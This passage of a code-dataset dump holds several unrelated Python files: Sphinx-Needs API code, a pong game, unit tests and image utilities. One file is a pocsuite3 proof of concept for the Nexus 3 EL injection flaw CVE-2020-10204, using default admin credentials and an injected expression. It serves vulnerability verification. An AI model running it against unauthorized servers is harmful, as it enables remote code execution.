car1_attributes\ndf_model[\"car2_attributes\"] = car2_attributes\ndf_model[\"car3_attributes\"] = car3_attributes\ndf_model[\"car4_attributes\"] = car4_attributes\ndf_model[\"car5_attributes\"] = car5_attributes\ndf_model[\"car1_brand\"] = car1_brand\ndf_model[\"car2_brand\"] = car2_brand\ndf_model[\"car3_brand\"] = car3_brand\ndf_model[\"car4_brand\"] = car4_brand\ndf_model[\"car5_brand\"] = car5_brand\ndf_model[\"car1_search\"] = car1_search\ndf_model[\"car2_search\"] = car2_search\ndf_model[\"car3_search\"] = car3_search\ndf_model[\"car4_search\"] = car4_search\ndf_model[\"car5_search\"] = car5_search\ndf_model[\"car1_rv_search\"] = car1_rv_search\ndf_model[\"car2_rv_search\"] = car2_rv_search\ndf_model[\"car3_rv_search\"] = car3_rv_search\ndf_model[\"car4_rv_search\"] = car4_rv_search\ndf_model[\"car5_rv_search\"] = car5_rv_search\ndf_model[\"car1_rv_title\"] = car1_rv_title\ndf_model[\"car2_rv_title\"] = car2_rv_title\ndf_model[\"car3_rv_title\"] = car3_rv_title\ndf_model[\"car4_rv_title\"] = car4_rv_title\ndf_model[\"car5_rv_title\"] = car5_rv_title\ndf_model[\"car1_rv_description\"] = car1_rv_description\ndf_model[\"car2_rv_description\"] = car2_rv_description\ndf_model[\"car3_rv_description\"] = car3_rv_description\ndf_model[\"car4_rv_description\"] = car4_rv_description\ndf_model[\"car5_rv_description\"] = car5_rv_description\ndf_model[\"car1_rv_attributes\"] = car1_rv_attributes\ndf_model[\"car2_rv_attributes\"] = car2_rv_attributes\ndf_model[\"car3_rv_attributes\"] = car3_rv_attributes\ndf_model[\"car4_rv_attributes\"] = car4_rv_attributes\ndf_model[\"car5_rv_attributes\"] = car5_rv_attributes\ndf_model[\"car1_rv_brand\"] = car1_rv_brand\ndf_model[\"car2_rv_brand\"] = car2_rv_brand\ndf_model[\"car3_rv_brand\"] = car3_rv_brand\ndf_model[\"car4_rv_brand\"] = car4_rv_brand\ndf_model[\"car5_rv_brand\"] = car5_rv_brand\n\ndf_model.to_csv(\"TF_IDF_features.csv\", index=False)","sub_path":"TF_IDF_features.py","file_name":"TF_IDF_features.py","file_ext":"py","file_size_in_byte":14055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"262675431","text":"import hashlib\nimport re\nimport os\nfrom docutils import nodes\nfrom jinja2 import Template\nfrom sphinxcontrib.needs.api.exceptions import NeedsNoIdException, NeedsInvalidException, NeedsStatusNotAllowed, \\\n NeedsTagNotAllowed, NeedsDuplicatedId, NeedsInvalidOption, NeedsTemplateException\nimport sphinxcontrib.needs.directives.need\nfrom sphinx.util.nodes import nested_parse_with_titles\nfrom sphinxcontrib.needs.roles.need_part import update_need_with_parts, find_parts\nfrom sphinxcontrib.needs.filter_common import filter_single_need\nimport sphinx\nfrom docutils.statemachine import ViewList\nfrom pkg_resources import parse_version\nsphinx_version = sphinx.__version__\nif parse_version(sphinx_version) >= parse_version(\"1.6\"):\n from sphinx.util import logging\nelse:\n import logging\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef add_need(app, state, docname, lineno, need_type, title, id=None, content=\"\", status=None, tags=None,\n links_string=None, hide=False, hide_tags=False, hide_status=False, collapse=None, style=None,\n layout=None, template=None, pre_template=None, post_template=None, **kwargs):\n \"\"\"\n Creates a new need and returns its node.\n\n ``add_need`` allows to create needs programmatically and use its returned node to be integrated in any\n docutils based structure.\n\n ``kwags`` can contain options defined in ``needs_extra_options`` and ``needs_extra_links``.\n If an entry is found in ``kwags``, which *is not* specified in the configuration or registered e.g. via\n ``add_extra_option``, an exception is raised.\n\n **Usage**:\n\n Normally needs get created during handling of a specialised directive.\n So this pseudo-code shows how to use ``add_need`` inside such a directive.\n\n .. code-block:: python\n\n from docutils.parsers.rst import Directive\n from sphinxcontrib.needs.api import add_need\n\n class MyDirective(Directive)\n # configs and init routine\n\n def run():\n main_section = []\n\n docname = self.state.document.settings.env.docname\n\n # All needed sphinx-internal information we can take from our current directive class.\n # e..g app, state, lineno\n main_section += add_need(self.env.app, self.state, docname, self.lineno,\n need_type=\"req\", title=\"my title\", id=\"ID_001\"\n content=self.content)\n\n # Feel free to add custom stuff to main_section like sections, text, ...\n\n return main_section\n\n :param app: Sphinx application object.\n :param state: Current state object.\n :param docname: documentation name.\n :param lineno: line number.\n :param need_type: Name of the need type to create.\n :param title: String as title.\n :param id: ID as string. If not given, a id will get generated.\n :param content: Content as single string.\n :param status: Status as string.\n :param tags: Tags as single string.\n :param links_string: Links as single string.\n :param hide: boolean value.\n :param hide_tags: boolean value. (Not used with Sphinx-Needs >0.5.0)\n :param hide_status: boolean value. (Not used with Sphinx-Needs >0.5.0)\n :param collapse: boolean value.\n :param style: String value of class attribute of node.\n :param layout: String value of layout definition to use\n :param template: Template name to use for the content of this need\n :param pre_template: Template name to use for content added before need\n :param post_template: Template name to use for the content added after need\n\n :return: node\n \"\"\"\n #############################################################################################\n # Get environment\n #############################################################################################\n env = app.env\n types = env.app.config.needs_types\n type_name = \"\"\n type_prefix = \"\"\n type_color = \"\"\n type_style = \"\"\n found = False\n for ntype in types:\n if ntype[\"directive\"] == need_type:\n type_name = ntype[\"title\"]\n type_prefix = ntype[\"prefix\"]\n type_color = ntype[\"color\"]\n type_style = ntype[\"style\"]\n found = True\n break\n if not found:\n # This should never happen. But it may happen, if Sphinx is called multiples times\n # inside one ongoing python process.\n # In this case the configuration from a prior sphinx run may be active, which has registered a directive,\n # which is reused inside a current document, but no type was defined for the current run...\n # Yeah, this really has happened...\n return [nodes.Text('', '')]\n\n # Get the id or generate a random string/hash string, which is hopefully unique\n # TODO: Check, if id was already given. If True, recalculate id\n # id = self.options.get(\"id\", ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for\n # _ in range(5)))\n if id is None and env.app.config.needs_id_required:\n raise NeedsNoIdException(\"An id is missing for this need and must be set, because 'needs_id_required' \"\n \"is set to True in conf.py. Need '{}' in {} ({})\".format(title, docname, lineno))\n\n if id is None:\n need_id = make_hashed_id(app, need_type, title, content)\n else:\n need_id = id\n\n if env.app.config.needs_id_regex and not re.match(env.app.config.needs_id_regex, need_id):\n raise NeedsInvalidException(\"Given ID '{id}' does not match configured regex '{regex}'\".format(\n id=need_id, regex=env.app.config.needs_id_regex))\n\n #print (\"create need: \", need_id, id)\n # Calculate target id, to be able to set a link back\n target_node = nodes.target('', '', ids=[need_id])\n #print (target_node)\n\n # Removed 0.5.0\n # if collapse is None:\n # collapse = getattr(env.app.config, \"needs_collapse_details\", True)\n\n # Handle status\n # Check if status is in needs_statuses. If not raise an error.\n if env.app.config.needs_statuses:\n if status not in [stat[\"name\"] for stat in env.app.config.needs_statuses]:\n raise NeedsStatusNotAllowed(\"Status {0} of need id {1} is not allowed \"\n \"by config value 'needs_statuses'.\".format(status, need_id))\n\n if tags is None:\n tags = []\n if len(tags) > 0:\n tags = [tag.strip() for tag in re.split(\";|,\", tags)]\n for i in range(len(tags)):\n if len(tags[i]) == 0 or tags[i].isspace():\n del (tags[i])\n logger.warning('Scruffy tag definition found in need {}. '\n 'Defined tag contains spaces only.'.format(need_id))\n\n # Check if tag is in needs_tags. If not raise an error.\n if env.app.config.needs_tags:\n for tag in tags:\n if tag not in [tag[\"name\"] for tag in env.app.config.needs_tags]:\n raise NeedsTagNotAllowed(\"Tag {0} of need id {1} is not allowed \"\n \"by config value 'needs_tags'.\".format(tag, need_id))\n # This may have cut also dynamic function strings, as they can contain , as well.\n # So let put them together again\n # ToDo: There may be a smart regex for the splitting. This would avoid this mess of code...\n tags = _fix_list_dyn_func(tags)\n\n #############################################################################################\n # Add need to global need list\n #############################################################################################\n # be sure, global var is available. If not, create it\n if not hasattr(env, 'needs_all_needs'):\n env.needs_all_needs = {}\n\n if need_id in env.needs_all_needs.keys():\n if id is not None:\n raise NeedsDuplicatedId(\"A need with ID {} already exists! \"\n \"This is not allowed. Document {}[{}] Title: {}.\".format(need_id, docname, lineno, title))\n else: # this is a generated ID\n raise NeedsDuplicatedId(\n \"Needs could not generate a unique ID for a need with \"\n \"the title '{}' because another need had the same title. \"\n \"Either supply IDs for the requirements or ensure the \"\n \"titles are different. NOTE: If title is being generated \"\n \"from the content, then ensure the first sentence of the \"\n \"requirements are different.\".format(' '.join(title)))\n\n # Trim title if it is too long\n max_length = getattr(env.app.config, 'needs_max_title_length', 30)\n if max_length == -1 or len(title) <= max_length:\n trimmed_title = title\n elif max_length <= 3:\n trimmed_title = title[:max_length]\n else:\n trimmed_title = title[:max_length - 3] + '...'\n\n # Add the need and all needed information\n needs_info = {\n 'docname': docname,\n 'lineno': lineno,\n 'target_node': target_node,\n 'content_node': None, # gets set after rst parsing\n 'type': need_type,\n 'type_name': type_name,\n 'type_prefix': type_prefix,\n 'type_color': type_color,\n 'type_style': type_style,\n 'status': status,\n 'tags': tags,\n 'id': need_id,\n 'title': trimmed_title,\n 'full_title': title,\n 'content': content,\n 'collapse': collapse,\n 'style': style,\n 'layout': layout,\n 'template': template,\n 'pre_template': pre_template,\n 'post_template': post_template,\n 'hide': hide,\n 'parts': {},\n\n 'is_part': False,\n 'is_need': True\n }\n #print (needs_info)\n needs_extra_options = env.config.needs_extra_options.keys()\n _merge_extra_options(needs_info, kwargs, needs_extra_options)\n\n needs_global_options = env.config.needs_global_options\n _merge_global_options(needs_info, needs_global_options)\n\n link_names = [x['option'] for x in env.config.needs_extra_links]\n for keyword in kwargs:\n if keyword not in needs_extra_options and keyword not in link_names:\n raise NeedsInvalidOption('Unknown Option {}. '\n 'Use needs_extra_options or needs_extra_links in conf.py'\n 'to define this option.'.format(keyword))\n\n # Merge links\n copy_links = []\n\n for link_type in env.config.needs_extra_links:\n # Check, if specific link-type got some arguments during method call\n if link_type['option'] not in list(kwargs.keys()) and link_type['option'] not in needs_global_options.keys():\n # if not we set no links, but entry in needS_info must be there\n links = []\n elif link_type['option'] in needs_global_options.keys() and \\\n (link_type['option'] not in list(kwargs.keys()) or len(str( kwargs[link_type['option']])) == 0):\n # If it is in global option, value got already set during prior handling of them\n links_string = needs_info[link_type['option']]\n links = _read_in_links(links_string)\n else:\n # if it is set in kwargs, take this value and maybe override set value from global_options\n links_string = kwargs[link_type['option']]\n links = _read_in_links(links_string)\n\n needs_info[link_type[\"option\"]] = links\n needs_info['{}_back'.format(link_type[\"option\"])] = set()\n\n if 'copy' not in link_type.keys():\n link_type['copy'] = False\n\n if link_type['copy'] and link_type['option'] != 'links':\n copy_links += links # Save extra links for main-links\n\n needs_info['links'] += copy_links # Set copied links to main-links\n\n env.needs_all_needs[need_id] = needs_info\n\n # Template builds\n ##############################\n\n # template\n if needs_info['template'] is not None and len(needs_info['template']) > 0:\n new_content = _prepare_template(app, needs_info, 'template')\n # Overwrite current content\n content = new_content\n needs_info['content'] = new_content\n else:\n new_content = None\n\n # pre_template\n if needs_info['pre_template'] is not None and len(needs_info['pre_template']) > 0:\n pre_content = _prepare_template(app, needs_info, 'pre_template')\n needs_info['pre_content'] = pre_content\n else:\n pre_content = None\n\n # post_template\n if needs_info['post_template'] is not None and len(needs_info['post_template']) > 0:\n post_content = _prepare_template(app, needs_info, 'post_template')\n needs_info['post_content'] = post_content\n else:\n post_content = None\n\n if needs_info['hide']:\n return [target_node]\n\n # Adding of basic Need node.\n ############################\n # Title and meta data information gets added alter during event handling via process_need_nodes()\n # We just add a basic need node and render the rst-based content, because this can not be done later.\n # style_classes = ['need', type_name, 'need-{}'.format(type_name.lower())] # Used < 0.4.4\n style_classes = ['need', 'need-{}'.format(need_type.lower())]\n if style is not None and style != '':\n style_classes.append(style)\n\n node_need = sphinxcontrib.needs.directives.need.Need(\n '', classes=style_classes, ids=[need_id])\n\n # Render rst-based content and add it to the need-node\n\n node_need_content = _render_template(content, docname, lineno, state)\n need_parts = find_parts(node_need_content)\n update_need_with_parts(env, needs_info, need_parts)\n\n node_need += node_need_content.children\n\n needs_info['content_node'] = node_need\n #print(\"target_node: \", target_node)\n #print(\"node_need: \", node_need)\n #needs_info['content_node']['id'] = need_id\n\n return_nodes = [target_node] + [node_need]\n if pre_content is not None:\n node_need_pre_content = _render_template(pre_content, docname, lineno, state)\n pre_container = nodes.container()\n pre_container += node_need_pre_content.children\n return_nodes = [pre_container] + return_nodes\n\n if post_content is not None:\n node_need_post_content = _render_template(post_content, docname, lineno, state)\n post_container = nodes.container()\n post_container += node_need_post_content.children\n return_nodes = return_nodes + [post_container]\n\n \n return return_nodes\n\n\ndef _prepare_template(app, needs_info, template_key):\n template_folder = app.config.needs_template_folder\n if not os.path.isabs(template_folder):\n template_folder = os.path.join(app.confdir, template_folder)\n\n if not os.path.isdir(template_folder):\n raise NeedsTemplateException('Template folder does not exist: {}'.format(template_folder))\n\n template_file_name = needs_info[template_key] + '.need'\n template_path = os.path.join(template_folder, template_file_name)\n if not os.path.isfile(template_path):\n raise NeedsTemplateException('Template does not exist: {}'.format(template_path))\n\n with open(template_path, 'r') as template_file:\n template_content = ''.join(template_file.readlines())\n template_obj = Template(template_content)\n new_content = template_obj.render(**needs_info)\n\n return new_content\n\n\ndef _render_template(content, docname, lineno, state):\n rst = ViewList()\n for line in content.split('\\n'):\n rst.append(line, docname, lineno)\n node_need_content = nodes.Element()\n node_need_content.document = state.document\n nested_parse_with_titles(state, rst, node_need_content)\n return node_need_content\n\n\n\ndef _read_in_links(links_string):\n # Get links\n links = []\n if len(links_string) > 0:\n for link in re.split(\";|,\", links_string):\n if not link.isspace():\n links.append(link.strip())\n else:\n logger.warning('Grubby link definition found in need {}. '\n 'Defined link contains spaces only.'.format(id))\n\n # This may have cut also dynamic function strings, as they can contain , as well.\n # So let put them together again\n # ToDo: There may be a smart regex for the splitting. This would avoid this mess of code...\n return _fix_list_dyn_func(links)\n\n\ndef make_hashed_id(app, need_type, full_title, content, id_length=None):\n \"\"\"\n Creates an ID based on title or need.\n\n Also cares about the correct prefix, which is specified for each need type.\n\n :param app: Sphinx application object\n :param need_type: name of the need directive, e.g. req\n :param full_title: full title of the need\n :param content: content of the need\n :param id_length: maximum length of the generated ID\n :return: ID as string\n \"\"\"\n types = app.config.needs_types\n if id_length is None:\n id_length = app.config.needs_id_length\n type_prefix = None\n for ntype in types:\n if ntype[\"directive\"] == need_type:\n type_prefix = ntype[\"prefix\"]\n break\n if type_prefix is None:\n raise NeedsInvalidException('Given need_type {} is unknown. File {}'.format(need_type, app.env.docname))\n\n hashable_content = full_title or '\\n'.join(content)\n return \"%s%s\" % (type_prefix,\n hashlib.sha1(hashable_content.encode(\"UTF-8\"))\n .hexdigest()\n .upper()[:id_length])\n\n\ndef _fix_list_dyn_func(list):\n \"\"\"\n This searches a list for dynamic function fragments, which may have been cut by generic searches for \",|;\".\n\n Example:\n `link_a, [[copy('links', need_id)]]` this will be splitted in list of 3 parts:\n\n #. link_a\n #. [[copy('links'\n #. need_id)]]\n\n This function fixes the above list to the following:\n\n #. link_a\n #. [[copy('links', need_id)]]\n\n :param list: list which may contain splitted function calls\n :return: list of fixed elements\n \"\"\"\n open_func_string = False\n new_list = []\n for element in list:\n # If dyn_func got not cut, just add it\n if '[[' in element and ']]' in element:\n new_list.append(element)\n # Other check if this is the starting element of dyn function\n elif '[[' in element:\n open_func_string = True\n new_link = [element]\n # Check if this is the ending element if dyn function\n elif ']]' in element:\n new_link.append(element)\n open_func_string = False\n element = \",\".join(new_link)\n new_list.append(element)\n # Check it is a \"middle\" part of the dyn function\n elif open_func_string:\n new_link.append(element)\n # Looks like it isn't a cut dyn_func, just add.\n else:\n new_list.append(element)\n return new_list\n\n\ndef _merge_extra_options(needs_info, needs_kwargs, needs_extra_options):\n \"\"\"Add any extra options introduced via options_ext to needs_info\"\"\"\n extra_keys = set(needs_kwargs.keys()).difference(set(needs_info.keys()))\n\n for key in needs_extra_options:\n if key in extra_keys:\n needs_info[key] = str(needs_kwargs[key])\n elif key not in needs_info.keys():\n # Finally add all not used extra options with empty value to need_info.\n # Needed for filters, which need to access these empty/not used options.\n needs_info[key] = \"\"\n\n return extra_keys\n\n\ndef _merge_global_options(needs_info, global_options):\n \"\"\"Add all global defined options to needs_info\"\"\"\n if global_options is None:\n return\n for key, value in global_options.items():\n\n # If key already exists in needs_info, this global_option got overwritten manually in current need\n if key in needs_info.keys() and needs_info[key] is not None and len(str(needs_info[key])) > 0:\n continue\n\n if isinstance(value, tuple):\n values = [value]\n elif isinstance(value, list):\n values = value\n else:\n needs_info[key] = value\n continue\n\n for single_value in values:\n if len(single_value) < 2 or len(single_value) > 3:\n raise NeedsInvalidException('global option tuple has wrong amount of parameters: {}'.format(key))\n if filter_single_need(needs_info, single_value[1]):\n # Set value, if filter has matched\n needs_info[key] = single_value[0]\n elif len(single_value) == 3 and (key not in needs_info.keys() or len(str(needs_info[key])) > 0):\n # Otherwise set default, but only if no value was set before or value is \"\" and a default is defined\n needs_info[key] = single_value[2]\n else:\n # If not value was set until now, we have to set an empty value, so that we are sure that each need\n # has at least the key.\n if key not in needs_info.keys():\n needs_info[key] = ''\n\n\n","sub_path":"sphinxcontrib/needs/api/need.py","file_name":"need.py","file_ext":"py","file_size_in_byte":21136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"128720589","text":"# to jest komentarz\nimport pgzrun\nfrom random import randint, choice\n\n\nclass Paletka:\n def __init__(self, paletka, pozycja):\n self.paletka = paletka\n self.paletka.x = pozycja[0]\n self.paletka.y = pozycja[1]\n\n def drawing(self):\n self.paletka.draw()\n\n def move(self, direction):\n if direction == \"left\":\n self.paletka.x -= 5\n elif direction == \"right\":\n self.paletka.x += 5\n\n def bounce(self):\n # taki prosty zabieg nie wystarczy\n return self.paletka.distance_to(ball) < 60\n\n\n\n\ndef aktualizuj_pozycje_paletek():\n if keyboard.a:\n paletka_a.move(\"left\")\n if keyboard.s:\n paletka_a.move(\"right\")\n if keyboard.k:\n paletka_b.move(\"left\")\n if keyboard.l:\n paletka_b.move(\"right\")\n\ndef update_ball_position():\n if ball.direction_x == \"left\":\n ball.x -= ball.speed\n elif ball.direction_x == \"right\":\n ball.x += ball.speed\n\n if ball.direction_y == \"up\":\n ball.y -= ball.speed\n elif ball.direction_y == \"down\":\n ball.y += ball.speed\n\n if ball.x < 5:\n ball.direction_x = \"right\"\n elif ball.x > WIDTH - 5:\n ball.direction_x = \"left\"\n\n if ball.y < 5:\n ball.winner = \"GRACZ B\"\n ball.stop = True\n ball.game_run = False\n elif ball.y > HEIGHT - 5:\n ball.winner = \"GRACZ A\"\n ball.stop = True\n ball.game_run = False\n\ndef sprawdz_czy_odbijemy():\n if paletka_a.bounce():\n ball.direction_y = \"down\"\n if paletka_b.bounce():\n ball.direction_y = \"up\"\n\n\nWIDTH = 1280\nHEIGHT = 853\n\npaletka_a = Paletka(Actor(\"palette.png\"), (100, 20))\npaletka_b = Paletka(Actor(\"palette.png\"), (100, 830))\n\nball = Actor(\"ball.png\")\nball.x = randint(40, WIDTH - 40)\nball.y = HEIGHT // 2\n\n# dodajemy nasze właściwości\nball.start = False\nball.game_run = False\nball.stop = False\nball.winner = None\nball.direction_x = choice((\"left\", \"right\"))\nball.direction_y = choice((\"up\", \"down\"))\nball.speed = 2\n\ndef draw():\n screen.blit(\"desert-1654439_1280.jpg\", (0, 0))\n if not ball.start:\n screen.draw.text(\n \"Naciśnij SPACJĘ aby rozpocząć.\", (40, 150), fontsize=40, color=(0, 0, 0)\n )\n paletka_a.drawing()\n paletka_b.drawing()\n ball.draw()\n\ndef update():\n if not ball.start and keyboard.space:\n ball.game_run = True\n ball.start = True\n if ball.game_run:\n update_ball_position()\n aktualizuj_pozycje_paletek()\n sprawdz_czy_odbijemy()\n\npgzrun.go()\n","sub_path":"project-simple-03.py","file_name":"project-simple-03.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"621487624","text":"import pytest\n\nimport determined as det\n\n\ndef test_list_to_dict() -> None:\n r = det.util._list_to_dict([{\"a\": 1}, {\"b\": 2}, {\"a\": 2}])\n assert r == {\"a\": [1, 2], \"b\": [2]}\n\n\ndef test_dict_to_list() -> None:\n r = det.util._dict_to_list({\"a\": [1, 2], \"b\": [3, 4]})\n assert r == [{\"a\": 1, \"b\": 3}, {\"a\": 2, \"b\": 4}]\n\n\ndef test_sizeof_fmt() -> None:\n assert det.common.util.sizeof_fmt(1024) == \"1.0KB\"\n assert det.common.util.sizeof_fmt(36) == \"36.0B\"\n\n\ndef test_calculate_batch_sizes() -> None:\n # Valid cases.\n psbs, gbs = det.util.calculate_batch_sizes({\"global_batch_size\": 1}, 1, \"Trial\")\n assert (psbs, gbs) == (1, 1)\n psbs, gbs = det.util.calculate_batch_sizes({\"global_batch_size\": 8}, 2, \"Trial\")\n assert (psbs, gbs) == (4, 8)\n\n # Missing global_batch_size.\n with pytest.raises(det.errors.InvalidExperimentException, match=\"is a required hyperparameter\"):\n det.util.calculate_batch_sizes({}, 1, \"Trial\")\n\n # Invalid global_batch_size.\n for x in [\"1\", 32.0]:\n with pytest.raises(det.errors.InvalidExperimentException, match=\"must be an integer value\"):\n det.util.calculate_batch_sizes({\"global_batch_size\": x}, 1, \"Trial\")\n\n # global_batch_size too small.\n with pytest.raises(det.errors.InvalidExperimentException, match=\"to be greater or equal\"):\n det.util.calculate_batch_sizes({\"global_batch_size\": 1}, 2, \"Trial\")\n","sub_path":"harness/tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"51960031","text":"#!/usr/bin/env python\r\n#coding=utf-8\r\n\r\nimport random\r\nimport json\r\nimport base64\r\n\r\nfrom pocsuite3.api import requests as req\r\nfrom pocsuite3.api import register_poc\r\nfrom pocsuite3.api import Output, POCBase\r\nfrom pocsuite3.api import POC_CATEGORY, VUL_TYPE\r\n\r\n'''\r\nCVE-2020-10204: Nexus 3 EL injection\r\nAdmin access is required\r\n'''\r\nclass Nexus3_2020_10204_EL_INJECTION_POC(POCBase):\r\n vulID = 'Nexus3-CVE-2020-10204'\r\n appName = 'Nexus3'\r\n appVersion = 'Nexus Repository Manager OSS/Pro <=3.21.1'\r\n category = POC_CATEGORY.EXPLOITS.REMOTE\r\n vulType = VUL_TYPE.CODE_EXECUTION\r\n vulDate = '2020-04-01' # 漏洞公开的时间,不知道就写今天\r\n author = 'shadowsock5' # PoC作者的大名\r\n createDate = '2020-04-03' # 编写 PoC 的日期\r\n updateDate = '2020-04-03' # PoC 更新的时间,默认和编写时间一样\r\n references = ['https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31'] # 漏洞地址来源,0day不用写\r\n name = 'Nexus3 EL injection' # PoC 名称\r\n install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写\r\n cvss = u\"中危\"\r\n\r\n \r\n # 使用随机字符串作为banner,计算数字之后返回\r\n ran1 = random.randint(1,100)\r\n\r\n ran2 = random.randint(100,200)\r\n \r\n ran_sum = ran1 * ran2\r\n\r\n http_proxy = \"http://192.168.85.1:8087\"\r\n https_proxy = \"http://192.168.85.1:8087\"\r\n proxies = {\"http\": http_proxy, \"https\": https_proxy}\r\n\r\n\r\n def _verify(self):\r\n result={}\r\n\r\n vul_url = self.url\r\n \r\n target_url = vul_url + \"/service/extdirect\"\r\n\r\n j = {\r\n \"action\":\"coreui_User\",\r\n \"method\":\"create\",\r\n \"data\": [\r\n {\r\n \"userId\": \"shadowsock5\",\r\n \"firstName\": \"77\",\r\n \"lastName\": \"ss\",\r\n \"password\": \"password\",\r\n \"email\": \"77@qq.com\",\r\n \"status\": \"active\",\r\n \"roles\": [\r\n \"$\\\\A\" + \"{\" + str(self.ran1) + \"*\" + str(self.ran2) + \"}\"\r\n ]\r\n }\r\n ],\r\n \"type\":\"rpc\",\"tid\":4}\r\n \r\n try:\r\n self.headers.update(self.auth())\r\n print(self.headers)\r\n resp = req.post(target_url, json=j, headers=self.headers, proxies=self.proxies)\r\n except Exception as e:\r\n e.printStackTrace()\r\n \r\n\r\n if self.test_EL(resp):\r\n result['VerifyInfo'] = {}\r\n result['VerifyInfo']['URL'] = target_url\r\n return self.save_output(result)\r\n return self.save_output(result)\r\n\r\n\r\n\r\n def auth(self):\r\n user = \"admin\"\r\n password = \"admin123\"\r\n tmp = user + ':' + password\r\n auth = base64.b64encode(tmp.encode('ascii')).decode(\"utf-8\")\r\n headers = {'Authorization': 'Basic'+' '+auth}\r\n return headers\r\n\r\n\r\n\r\n # 验证EL表达式被执行\r\n def test_EL(self, p_resp):\r\n d = p_resp.json()\r\n result = d['result']['errors']['roles']\r\n print(result)\r\n print(self.ran_sum)\r\n try:\r\n if str(self.ran_sum) in result:\r\n return True\r\n except Exception:\r\n return False \r\n\r\n # 攻击模块\r\n def _attack(self):\r\n return self._verify()\r\n\r\n # 输出报告\r\n def save_output(self, result):\r\n output = Output(self)\r\n if result:\r\n output.success(result)\r\n else:\r\n output.fail()\r\n return output\r\n\r\nregister_poc(Nexus3_2020_10204_EL_INJECTION_POC)\r\n","sub_path":"nexes-manager/CVE-2020-10204.py","file_name":"CVE-2020-10204.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"1110209","text":"\n# encoding : https://www.youtube.com/watch?v=MwqDZb0QEl0&index=18&list=PLUujJDuOx6BIsByGjnCAum1do3erXsl81\n\nfile_name = 'test.txt'\n\ndef create_file() :\n f = open(file_name,mode='w')\n for x in range(1,21):\n f.write(str(x) + '\\n')\n f.close()\n\ndef open_file():\n try:\n f = open(file_name,mode='r')\n t = f.read()\n print(t)\n except FileNotFoundError :\n print('Ko tìm thấy file : %s' % file_name )\n finally:\n f.close()\n\ncreate_file()\nopen_file()\n","sub_path":"syntax/file/file_example.py","file_name":"file_example.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"49671836","text":"#-*- coding: utf-8 -*-\nimport os\nimport Image\nfrom django.conf import settings\n\ndef get_thumbnail_filename(filepath, size, crop=False):\n if isinstance( size, tuple ):\n size = '%dx%d' % size[:2]\n filehead, filetail = os.path.split(filepath)\n basename, format = os.path.splitext(filetail)\n miniature = basename + '_' + size + ( 'c' if crop else '') + format\n\n return miniature\n\n# modified snippet from djangosnippets.org\ndef create_thumbnail(file, size=settings.THUMBNAILS_SIZE, miniature_subdir=settings.THUMBNAILS_SUBDIR, crop=False):\n if isinstance( size, tuple ):\n x, y = size[:2]\n elif isinstance( size, basestring ):\n x, y = [float(x) for x in size.split('x')]\n #getting miniature name\n miniature = get_thumbnail_filename(file.path, size, crop)\n #getting miniature url\n filehead, filetail = os.path.split(file.url)\n filehead = os.path.join(filehead,miniature_subdir)\n miniature_url = filehead + '/' + miniature\n #getting miniature filename\n filehead2, filetail2 = os.path.split(file.path)\n filehead2 = os.path.join(filehead2,miniature_subdir)\n miniature_filename = os.path.join(filehead2, miniature)\n if os.path.exists(miniature_filename) and os.path.getmtime(file.path)>os.path.getmtime(miniature_filename):\n os.unlink(miniature_filename)\n # if miniature subdir does ot exist, create it\n subdir, fn = os.path.split(file.path)\n p = os.path.join(subdir,miniature_subdir)\n if not os.path.exists(p):\n os.mkdir(p)\n i = open(os.path.join(p,\"index.html\"),\"w\")\n i.close()\n # if the image wasn't already resized, resize it\n if not os.path.exists(miniature_filename):\n image = Image.open(file.path)\n if crop:\n cx,cy = image.size\n s = min(cx/x,cy/y)\n nx,ny = int(s*x),int(s*y)\n ox,oy = int((cx-nx)/2),int((cy-ny)/2)\n box = (ox,oy,ox+nx,oy+ny)\n image = image.crop(box)\n image.thumbnail([int(x), int(y)], Image.ANTIALIAS)\n try:\n image.save(miniature_filename, image.format, quality=90, optimize=1)\n except:\n image.save(miniature_filename, image.format, quality=90)\n\n return miniature_url\n","sub_path":"thumbnails/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"475396943","text":"from codes import cfg\nfrom torch.autograd import Variable\nfrom torchvision.utils import save_image\nfrom matplotlib import pyplot as plt\n\nfrom data.train_dataset import train_dataset\nimport utils.loss as ls\nfrom utils import metric as mc\nfrom utils.utils import *\n\nimport os\nimport cv2\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '2'\ncuda = True if torch.cuda.is_available() else False\n\n\ndef various_distance(out_vec_t0, out_vec_t1, dist_flag):\n if dist_flag == 'l2':\n distance = F.pairwise_distance(out_vec_t0, out_vec_t1, p=2)\n if dist_flag == 'l1':\n distance = F.pairwise_distance(out_vec_t0, out_vec_t1, p=1)\n if dist_flag == 'cos':\n distance = 1 - F.cosine_similarity(out_vec_t0, out_vec_t1)\n return distance\n\ndef single_layer_heatmap_visual(output_t0, output_t1, save_change_map_dir, filename, layer_flag, dist_flag, idx):\n n, c, h, w = output_t0.data.shape\n out_t0_rz = torch.transpose(output_t0.view(c, h * w), 1, 0)\n out_t1_rz = torch.transpose(output_t1.view(c, h * w), 1, 0)\n distance = various_distance(out_t0_rz, out_t1_rz, dist_flag)\n distance = (distance > 1.0).float()\n similar_distance_map = distance.view(h, w).data.cpu().numpy()\n similar_distance_map_rz = Variable(torch.from_numpy(similar_distance_map[np.newaxis, np.newaxis, 